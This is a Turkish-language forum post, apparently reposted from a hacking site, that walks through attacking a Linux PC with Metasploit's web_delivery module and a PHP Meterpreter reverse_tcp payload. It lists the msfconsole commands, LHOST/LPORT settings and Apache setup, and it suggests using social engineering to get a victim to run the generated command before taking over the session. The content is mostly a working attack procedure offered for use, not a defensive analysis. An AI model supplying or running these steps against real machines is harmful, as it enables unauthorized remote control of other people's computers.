Black_Track(Kali) İle GNU-Linux Yüklü PC'ye Saldırma/Sızma Operasyonu

Linux ve Unix tabanli isletim sistemlerini hep beraber tanıyıp öğreneceğiz.
Cevapla
Kullanıcı avatarı
TRWE_2012
Zettabyte1
Zettabyte1
Mesajlar: 15297
Kayıt: 25 Eyl 2013, 13:38
cinsiyet: Erkek
Teşekkür etti: 2556 kez
Teşekkür edildi: 5399 kez

Black_Track(Kali) İle GNU-Linux Yüklü PC'ye Saldırma/Sızma Operasyonu

Mesaj gönderen TRWE_2012 »

Merhabalar

Bu resimli anlatımlı makale

Kod: Tümünü seç

https://www.turkhackteam.org
web sitesine ait olup TRWE_2012 genel net ilkeleri gereği telif haklarıyla kaynak olarak siteyi göstermiştir.Bu resimli anlatım "Linux Güvenlidir Algısını Kökünden Sarsacak Niteliğe Sahip, adeta bir tokat 'tır .....Dünya da hiçbir sistem %100 güvenli değildir/olmamıştır/olmayacaktır.

********************************************************************************************************

Merhaba, bu konuda sizlere linux sistemlere m-e-t-asploit kullanarak nasıl sızabilirsiniz göstereceğim.

İlk olarak konsolu açarak

Kod: Tümünü seç

service postgresql start
komutunu veriyoruz.

Resim

Daha sonra

Kod: Tümünü seç

msfconsole -q 
komutunu veriyoruz.

Resim

Msf açıldıktan sonra

Kod: Tümünü seç

use exploit/multi/script/web_delivery
komutunu kullanıyoruz.

Resim

Şimdi ise

Kod: Tümünü seç

show target
yazarak listeden php modülünü seçiyoruz seçmek için

Kod: Tümünü seç

set target 1
yazıp enterliyoruz. Gelen bağlantı olacağı için

Kod: Tümünü seç

set payload php/meterpreter/reverse_tcp 
yazarak tekrar enterliyoruz.

Resim

Ben local ağ üzerinde yapacağım için yeni pencere açarak

Kod: Tümünü seç

ifconfig 
yazıyorum ve local adresime bakıyorum.

Resim

Resim

192.168.1.41 benim local adresim şimdi msf'ye dönüyoruz ve

Kod: Tümünü seç

 set LHOST IP
yazıp enterliyoruz. Varsayılan olarak bize 4444 portunu veriyor. Sizin portunuz ne ise

Kod: Tümünü seç

set LPORT PORT
olarak belirtebilirsiniz.
Örnek: set LHOST 192.168.1.41
set LPORT 7777
Resim

Kod: Tümünü seç

show options 
komutunu vererek bilgilerimi kontrol ediyorum.

Resim

Şimdi ise tekrar yeni pencere açarak

Kod: Tümünü seç

service apache2 start 
yazıp enterliyoruz. Kontrol etmek isterseniz s

Kod: Tümünü seç

ervice apache2 status
yazarak kontrol edebilirsiniz.

Resim

Resim

Son olarak msf'ye tekrar dönüp yazıyoruz.

Resim

Ve bize bir adres veriyor isterseniz oradaki linki tarayıcada açtırabilirsiniz. Sosyal mühendislik ile de direk komut olarak girdirebilirsiniz.

Resim

Ben komut olarak kendi makinemde açıyorum.

Resim

Açtığım gibi gözüktü dış ağdaki biri için portunuzun olması gerekiyor unutmayın.

Resim

sessions komutunu kullanarak cihazları görebilirsiniz. Hedef cihaza bağlanmak için sessions -i hedef sırası
Örnek: sessions -i 1
Resim

Kod: Tümünü seç

help 
komutunu kullanarak neler yapabileceğinizi görebilirsiniz.

Resim
Kullanıcı avatarı
TRWE_2012
Zettabyte1
Zettabyte1
Mesajlar: 15297
Kayıt: 25 Eyl 2013, 13:38
cinsiyet: Erkek
Teşekkür etti: 2556 kez
Teşekkür edildi: 5399 kez

Re: Black_Track(Kali) İle GNU-Linux Yüklü PC'ye Saldırma/Sızma Operasyonu

Mesaj gönderen TRWE_2012 »

NOT:

Not:

Burada kullanılan sızma paketi aşağıdaki konuda izahlandırılmıştır.

https://tools.kali.org/information-gathering/apt2
Cevapla

“Linux ve Unix tabanli isletim sistemleri” sayfasına dön